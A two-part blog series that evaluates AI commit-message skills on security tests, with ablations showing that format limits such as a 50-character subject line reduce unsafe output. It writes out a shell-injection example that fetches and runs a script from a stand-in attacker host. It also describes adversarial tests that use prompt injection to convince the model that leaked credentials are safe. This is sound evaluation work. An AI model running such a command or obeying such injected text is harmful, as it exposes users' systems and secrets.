DEV Community: snazar

An ablation study on security outcomes: Which parts of an AI skill actually matter?

snazar — Sat, 31 Jan 2026 22:40:11 +0000

Originally published at faberlens.ai. This is Part 2 of the series; Part 1 is "The AI Skill Quality Crisis".

In Part 1, we found that epicenter — a skill with zero security rules — outperformed security-focused alternatives on security tests. Our hypothesis: format constraints provide "implicit security."

epicenter achieved +6.0% overall lift despite containing no mentions of credentials, secrets, or security. We hypothesized that its format constraints — particularly the 50-character limit and scope abstraction rules — were doing the heavy lifting.

Hypotheses are cheap. We ran the experiments.

The Hypothesis

Our core claim: format constraints provide implicit security. If true, we should see specific, testable predictions:

Removing the character limit should hurt shell safety (S4) — longer messages can contain injection patterns
Removing scope abstraction rules should hurt path sanitization (S5) — the model will include literal file paths
Adding explicit security rules should improve credential detection (S1) — but may cause over-refusal on safe content

If these predictions hold, we have evidence that epicenter's security comes from structure, not luck. If they don't, our hypothesis is wrong and we need a different explanation.

The Ablation Method

Ablation testing isolates variables by systematically removing them. We created four variants of epicenter: two with a single constraint removed, one with explicit security rules added, and one stripped down to its core format rules:

Variant	Change	Tests Hypothesis
epicenter-no-limit	Removed "50-72 characters" rule	Character limit → shell safety
epicenter-no-scope	Removed scope abstraction guidelines	Abstract scopes → path sanitization
epicenter-plus-security	Added explicit credential detection rules	Security rules → over-refusal
epicenter-minimal	Kept only core format rules (36 lines)	Core constraints vs verbose guidance

Each variant was evaluated on relevant security categories using the same protocol: Claude Haiku generation, 3 runs per test.
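As a rough illustration of how a single-rule ablation variant could be produced, here is a minimal sketch. The `make_variant` helper and the three-line `skill` excerpt are hypothetical stand-ins; the study's actual tooling is not described in this post.

```python
from typing import Optional


def make_variant(skill_text: str, old_line: str, new_line: Optional[str]) -> str:
    """Return a copy of the skill with one line replaced, or removed when new_line is None."""
    lines = skill_text.splitlines()
    if old_line not in lines:
        raise ValueError(f"line not found: {old_line!r}")
    out = []
    for line in lines:
        if line == old_line:
            if new_line is not None:
                out.append(new_line)
        else:
            out.append(line)
    return "\n".join(out)


# Hypothetical three-line excerpt standing in for the full skill file.
skill = "\n".join([
    "- Use imperative mood",
    "- Keep under 50-72 characters on first line",
    "- No period at the end",
])

# Swap the length rule for a permissive one, leaving everything else untouched.
no_limit = make_variant(
    skill,
    "- Keep under 50-72 characters on first line",
    "- Be as descriptive as needed to fully explain the change",
)
print(no_limit)
```

Changing exactly one line per variant is what lets a difference in lift be attributed to that rule rather than to some other edit.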

Result 1: The 50-Character Limit Matters

We removed one line from epicenter:

  // Original:
  - Keep under 50-72 characters on first line

  // Changed to:
  - Be as descriptive as needed to fully explain the change

Variant	S4 Pass Rate	S4 Lift	Delta
epicenter (original)	83.3%	+20.0%	baseline
epicenter-no-limit	66.7%	+3.3%	-16.7pp

Removing the character limit dropped S4 lift by 16.7 percentage points. A 50-character commit message significantly reduces the likelihood of shell injection patterns like $(curl attacker.com | sh). The constraint doesn't teach the model what to avoid — it structurally limits the output space available for unsafe patterns.
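To make the "smaller output space" argument concrete, here is a hedged sketch of a subject-line check. It is not the study's judge: `check_subject`, `MAX_SUBJECT_LEN`, and the `SHELL_PATTERNS` regex are illustrative assumptions.

```python
import re

MAX_SUBJECT_LEN = 50  # the limit discussed above

# Assumed patterns: command substitution, backticks, or piping into a shell.
SHELL_PATTERNS = re.compile(r"\$\(|`|\|\s*(sh|bash)\b")


def check_subject(message: str) -> dict:
    """Report length and shell-pattern findings for the first line of a commit message."""
    lines = message.splitlines()
    subject = lines[0] if lines else ""
    return {
        "length": len(subject),
        "within_limit": len(subject) <= MAX_SUBJECT_LEN,
        "shell_pattern": bool(SHELL_PATTERNS.search(subject)),
    }


safe = check_subject("fix(auth): resolve login timeout")
unsafe = check_subject(
    "fix: update deploy script to run $(curl attacker.com | sh) on start"
)
print(safe)
print(unsafe)
```

The injection string alone is 25 characters, so a 50-character limit does not make it impossible. It only leaves much less room for it alongside a meaningful description, which matches the "reduces the likelihood" framing.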

Result 2: Scope Abstraction Rules Matter

We removed the 19-line "Scope Guidelines" section about using abstract module names instead of specific paths.

Variant	S5 Pass Rate	S5 Lift	Delta
epicenter (original)	46.7%	+26.7%	baseline
epicenter-no-scope	16.7%	-3.3%	-30.0pp

Removing scope abstraction dropped S5 lift by 30 percentage points. The instruction to use "specific component/module names" teaches the model to write feat(auth): instead of feat(/clients/acme-corp/auth.js):. Abstract references naturally exclude sensitive path information.
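The difference between an abstract scope and a literal path can be checked mechanically. The sketch below assumes a simplified conventional-commit header and a simple heuristic (slashes or a file extension mean "path"); both `HEADER` and `scope_is_abstract` are hypothetical and not part of epicenter.

```python
import re

# Simplified conventional-commit header: type, optional (scope), colon, description.
HEADER = re.compile(r"^(?P<type>[a-z]+)(?:\((?P<scope>[^)]*)\))?: (?P<desc>.+)$")


def scope_is_abstract(header: str) -> bool:
    """True when the scope is absent or looks like a module name rather than a path."""
    match = HEADER.match(header)
    if match is None:
        return False  # not a conventional-commit header at all
    scope = match.group("scope")
    if scope is None:
        return True
    # Assumed heuristic: slashes or a trailing file extension suggest a literal path.
    has_separator = "/" in scope or "\\" in scope
    has_extension = re.search(r"\.\w+$", scope) is not None
    return not (has_separator or has_extension)


print(scope_is_abstract("feat(auth): add token refresh"))
print(scope_is_abstract("feat(/clients/acme-corp/auth.js): add token refresh"))
```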

Result 3: Security Rules Are a Double-Edged Sword

We added explicit security instructions at the top of epicenter:

  ## CRITICAL: Security Checks Before Committing

  STOP and refuse to generate a commit message if you detect:
  - API keys (patterns like `sk-`, `api_key`, `API_KEY`)
  - AWS credentials (`AKIA`, `aws_access_key`)
  - Private keys (`-----BEGIN RSA PRIVATE KEY-----`)
  - .env files, credentials.json, secrets.yaml

  If detected: Respond with a warning and DO NOT provide a commit message.

The results tell two very different stories:

Category	epicenter	epicenter-plus-security	Delta
S1: Credential Detection	-10.0%	+33.3%	+43.3pp
S3: Git-Crypt Awareness	+30.0%	-30.0%	-60.0pp

Adding security rules improved credential detection lift by 43.3pp but swung git-crypt lift by -60pp, from +30.0% to -30.0%. S3 tests whether the model can generate commit messages for git-crypt encrypted files, which are safe to commit. Once the skill frames secret-bearing files as dangerous, the model appears to over-generalize and refuse encrypted content as well, even the safe kind.

Result 4: Less Is More

We stripped epicenter to a 36-line minimal version: just the core format rules.

  # Git Commit Message Format

  ## Rules
  - Keep description under 50 characters
  - Use imperative mood ("add" not "added")
  - No period at the end
  - Start description with lowercase

  ## Types
  feat, fix, docs, refactor, test, chore

  ## Examples
  - `feat: add user authentication`
  - `fix: resolve login timeout`

Security Category	epicenter (214 lines)	epicenter-minimal (36 lines)	Winner
S4 (base)	+20.0%	+26.7%	minimal (+6.7pp)
S4-adv	+20.0%	+30.0%	minimal (+10.0pp)
S5 (base)	+26.7%	+16.7%	epicenter (+10.0pp)
S5-adv	+36.7%	+43.3%	minimal (+6.6pp)

The 36-line minimal version outperformed the 214-line original on 3 of 4 security categories tested.
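The "3 of 4" tally can be re-derived directly from the table. The sketch below copies the lift values from the rows above; only the variable names are invented.

```python
# Lift values (percent) copied from the table above.
RESULTS = {
    "S4 (base)": {"epicenter": 20.0, "minimal": 26.7},
    "S4-adv": {"epicenter": 20.0, "minimal": 30.0},
    "S5 (base)": {"epicenter": 26.7, "minimal": 16.7},
    "S5-adv": {"epicenter": 36.7, "minimal": 43.3},
}

minimal_wins = 0
for category, lifts in RESULTS.items():
    delta = lifts["minimal"] - lifts["epicenter"]
    winner = "minimal" if delta > 0 else "epicenter"
    if delta > 0:
        minimal_wins += 1
    print(f"{category}: {winner} by {abs(delta):.1f}pp")

print(f"minimal wins {minimal_wins} of {len(RESULTS)}")
# → minimal wins 3 of 4
```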

Verbose instructions may dilute the model's focus on critical constraints. When surrounded by 200 lines of PR formatting guidelines, the 50-character rule is one of many. When it's front and center in a 36-line skill, it dominates.

Note: This finding is specific to security evaluations — we haven't tested whether minimal skills perform equally well on formatting or other quality dimensions.

Adversarial Robustness

Format constraints have another advantage: they're evasion-resistant. Attackers can obfuscate credentials to evade pattern matching. They can't obfuscate a character limit — the constraint is on output, not input.

Variant	S4 Base	S4 Adversarial	Collapse?
epicenter	+20.0%	+20.0%	None (stable)
epicenter-minimal	+26.7%	+30.0%	None (improves)

Both variants maintain or improve performance on adversarial tests.
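The asymmetry between input-side pattern matching and output-side constraints can be illustrated with a small sketch. The regex, the helper names, and the sample strings are assumptions for illustration; the key shown is the placeholder commonly used in AWS documentation, not a real credential.

```python
import re

# Assumed detector: "AKIA" followed by 16 uppercase letters or digits.
AWS_KEY = re.compile(r"AKIA[0-9A-Z]{16}")


def pattern_flags(text: str) -> bool:
    """Input-side check: does the text contain something shaped like an AWS key ID?"""
    return AWS_KEY.search(text) is not None


def within_limit(subject: str, limit: int = 50) -> bool:
    """Output-side check: depends only on the generated subject line."""
    return len(subject) <= limit


plain = "aws_key = AKIAIOSFODNN7EXAMPLE"
obfuscated = "aws_key = 'AKIA' + 'IOSFODNN7EXAMPLE'"  # same key, split in two

print(pattern_flags(plain))       # the regex sees the key
print(pattern_flags(obfuscated))  # the split hides it from the regex
print(within_limit("chore(config): update credentials loader"))
```

Splitting the key defeats the detector because the detector reads the attacker-controlled input. The length check never looks at the input, so there is nothing on that side for the attacker to obfuscate.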

What We Learned

Format constraints provide measurable security. The 50-char limit contributes +16.7pp to shell safety. Scope abstraction contributes +30pp to path sanitization.
Security rules create trade-offs. They improve credential detection (+43pp) but cause over-refusal on safe content (-60pp).
Less can be more for security. A 36-line minimal skill outperformed the 214-line original on most security categories tested.
Constraints are harder to evade. Unlike pattern matching, output constraints are less susceptible to input obfuscation — though not immune.

Implications for Skill Design

If you're building skills, consider:

Use structural constraints when possible. A character limit is more robust than "don't include shell commands."
Test before adding security rules. They may hurt more than they help.
Keep skills focused. Core constraints get diluted in verbose prompts.
Measure, don't assume. Our intuitions about what works are often wrong.

Limitations

Results use Claude Haiku — larger models may handle verbose instructions differently
Security-only evaluation — formatting quality was not tested
Single domain (commit messages) — patterns may not generalize
n=5 skills in the original study — ablation adds depth but not breadth

Full methodology and judge rubrics: faberlens.ai/methodology

Part 1 of this series: The AI Skill Quality Crisis

We tested 5 AI commit-message skills on security. 3 made things worse.

snazar — Sat, 31 Jan 2026 22:22:48 +0000

Originally published at faberlens.ai

Reusable AI components are exploding — skills, MCP servers, templates, subagents. But there's no shared way to answer: "Will this actually help?" We ran a behavioral evaluation study to find out. The results were surprising.

Of 5 commit-message skills we tested from GitHub for security, only 2 showed positive lift over baseline. The other 3 produced negative lift — worse outcomes than using no skill at all. And the top performer? A skill with zero security rules.

Even more striking: in our small sample, static analysis was an unreliable predictor of overall security performance. The skill that "looked" least secure (scoring 42/100 on prompt-only review) achieved the highest lift. Static analysis did predict credential detection well — but failed across other categories. With only 5 skills this is a preliminary signal, not a definitive finding — but it suggests you need to measure what a skill does, not just read what it says.

What is Lift?

To measure whether a skill actually helps, we need a baseline-relative metric. We call it lift:

Lift = Skill Pass Rate − Baseline Pass Rate

Positive lift means the skill adds value. Negative lift means you're better off without it.

In our tests, the baseline (Claude with no skill) achieved 50% overall pass rate across security categories. But this varies dramatically by category:

Category	Baseline	Interpretation
S1: Credential Detection	81.7%	Model already good at obvious credentials
S2: Credential Files	85.0%	Model already good at .env detection
S3: Git-Crypt Awareness	15.0%	Model over-refuses encrypted files
S4: Shell Safety	53.3%	Model sometimes includes unsafe syntax
S5: Path Sanitization	16.7%	Model often leaks sensitive paths

Baseline varies from 15% to 85%. Skills add most value where baseline is weak (S3, S4, S5).
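As a worked example of the metric, the sketch below computes lift and re-derives the overall baseline from the table. It assumes each category contributes the same number of tests, so the overall rate is an unweighted mean; the 40% skill pass rate is a made-up input.

```python
# Baseline pass rates (percent) copied from the table above.
BASELINE = {
    "S1": 81.7,
    "S2": 85.0,
    "S3": 15.0,
    "S4": 53.3,
    "S5": 16.7,
}


def lift(skill_pass_rate: float, baseline_pass_rate: float) -> float:
    """Lift in percentage points: skill pass rate minus baseline pass rate."""
    return skill_pass_rate - baseline_pass_rate


# Unweighted mean across categories (assumes equal test counts per category).
overall_baseline = sum(BASELINE.values()) / len(BASELINE)
print(f"overall baseline: {overall_baseline:.1f}%")
# → overall baseline: 50.3%

# Hypothetical skill that passes 40% of S5 tests.
print(f"S5 lift: {lift(40.0, BASELINE['S5']):+.1f}pp")
# → S5 lift: +23.3pp
```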

The 5 Skills We Tested

We selected 5 commit-message skills from public GitHub repositories and tested each on 100 security scenarios (5 categories × 2 difficulty levels × 10 tests each). Each test was run 3 times to reduce noise (~1,500 total executions). Generation uses Claude Haiku; results may differ with larger models.

Skill	Length	Approach	Lift
epicenter	8,586 chars	Strict conventional commits with 50-char limit	+6.0%
ilude	8,389 chars	Comprehensive git workflow with security scanning	+1.7%
toolhive	431 chars	Minimal best practices	-1.0%
kanopi	4,610 chars	Balanced commit conventions with security warnings	-4.0%
claude-code-helper	4,376 chars	General-purpose assistant with commit capabilities	-4.3%
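The execution count follows from the test design. The sketch below assumes the ~1,500 figure counts skill runs only, across all 5 skills; baseline runs, if counted separately, would come on top of that.

```python
categories = 5
difficulty_levels = 2
tests_per_cell = 10
runs_per_test = 3
skills = 5

# Scenarios in the suite, then total generations across all skills.
scenarios = categories * difficulty_levels * tests_per_cell
executions = scenarios * runs_per_test * skills

print(f"scenarios: {scenarios}")    # → scenarios: 100
print(f"executions: {executions}")  # → executions: 1500
```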

The Surprising Winner

The top performer, epicenter, contains zero security instructions. No credential detection. No secret scanning. No warnings about sensitive files.

Meanwhile, kanopi explicitly mentions API keys, secrets, and credentials, and still lands at -4.0% lift, below the no-skill baseline.

How did a format-focused skill beat security-focused ones on security tests?

Constraint-based safety. epicenter's strict 50-character limit significantly reduces the likelihood of shell metacharacters appearing in output. Its abstract scope requirements discourage sensitive path details. Format constraints provide implicit security without explicit rules.

Important caveat: epicenter's overall lift hides category-specific weaknesses. It scores -10% on S1 (credential detection) and -27% on S2 (credential files) — worse than using no skill at all. Its +6% overall lift comes entirely from dominating S3/S4/S5. If your priority is catching API keys, epicenter is the wrong choice.

Static Analysis Was an Unreliable Predictor

If explicit security rules don't predict success, can we evaluate skills by reading them? We tested this by having Claude rate each skill (0-100) on security awareness based solely on the prompt text.

Skill	Security Mentions	Static Score	Actual Lift
epicenter	None — pure format guidance	42/100	+6.0%
ilude	Explicit scanning rules, git-crypt exceptions	78/100	+1.7%
kanopi	API keys, secrets, credentials, .env files	52/100	-4.0%

Static analysis scores showed weak correlation with actual lift (r = 0.32). epicenter scored lowest on static security analysis (42/100) yet achieved the highest lift (+6.0%).

For shell safety (S4) and git-crypt awareness (S3), we found negative correlations — skills with more explicit rules performed worse:

Category	Correlation	Meaning
S1: Credential Detection	+0.87	Explicit rules help
S4: Shell Safety	-0.68	More rules = worse performance
S3: Git-Crypt	-0.50	More rules = worse performance

With n=5, these correlations are noisy and we're not claiming statistical significance. But the pattern is notable: for some categories, detailed instructions actively backfire.
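For readers who want to run this kind of check on their own skills, here is a minimal Pearson correlation sketch. It uses only the three static-score rows published above (epicenter, ilude, kanopi), so it is not expected to reproduce r = 0.32, which was computed over all five skills.

```python
from math import sqrt


def pearson(xs: list[float], ys: list[float]) -> float:
    """Pearson correlation coefficient of two equal-length samples."""
    if len(xs) != len(ys) or len(xs) < 2:
        raise ValueError("need two samples of equal length >= 2")
    mean_x = sum(xs) / len(xs)
    mean_y = sum(ys) / len(ys)
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    return cov / sqrt(var_x * var_y)


# Only the three rows published in the static-score table above.
static_scores = [42.0, 78.0, 52.0]
actual_lift = [6.0, 1.7, -4.0]

r = pearson(static_scores, actual_lift)
print(f"r over the three published rows: {r:+.2f}")
```

With so few points a single skill can flip the sign of the coefficient, which is the practical meaning of "noisy" here.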

The Awareness Trap

Our test suite includes base (straightforward) and adversarial variants. Adversarial tests present the same threats but add prompt injection context designed to trick the model into ignoring them.

toolhive shows the most dramatic failure:

Skill	S1 Base	S1 Adversarial	Collapse
toolhive	+16.7%	-23.3%	-40pp
ilude	+33.3%	+3.3%	-30pp

toolhive goes from +16.7% to -23.3% — a 40 percentage point collapse. It handles straightforward cases well but fails when prompt injection tries to convince the model the credentials are safe.

Why doesn't epicenter collapse? Because it doesn't rely on pattern-matching. Its format rules constrain the output, not the input. No amount of social engineering changes the fact that a 50-character commit message leaves little room for a full API key.

Why Format Beats Rules

epicenter's success reveals a deeper principle: structural constraints can provide security that explicit rules cannot.

Format Constraint	Security Effect	epicenter Lift
50-char limit	Less room for shell commands like `$(cmd)`	+20% (S4)
Abstract scopes	Discourages client names or file paths	+27% (S5)
No security rules	No over-refusal of encrypted files	+30% (S3)

Instead of listing what to avoid, set structural limits that reduce the likelihood of violations. A 50-character limit doesn't mention shell injection — but it significantly constrains the output space available for unsafe patterns.

Limitations

This study covers one aspect of one domain:

Scope: 5 skills, 1 domain, security-focused tests
Models: Results use Claude Haiku for generation. Larger models may handle verbose instructions differently
Rigor: Results have been human-audited. We're publishing judge prompts, agreement rates, and confidence intervals

We're publishing early because limited data beats no data, and we'd rather be challenged on real numbers than trusted on intuition.

Full methodology and judge rubrics: faberlens.ai/methodology

Part 2 of this series covers ablation testing — isolating exactly which constraints matter: faberlens.ai/blog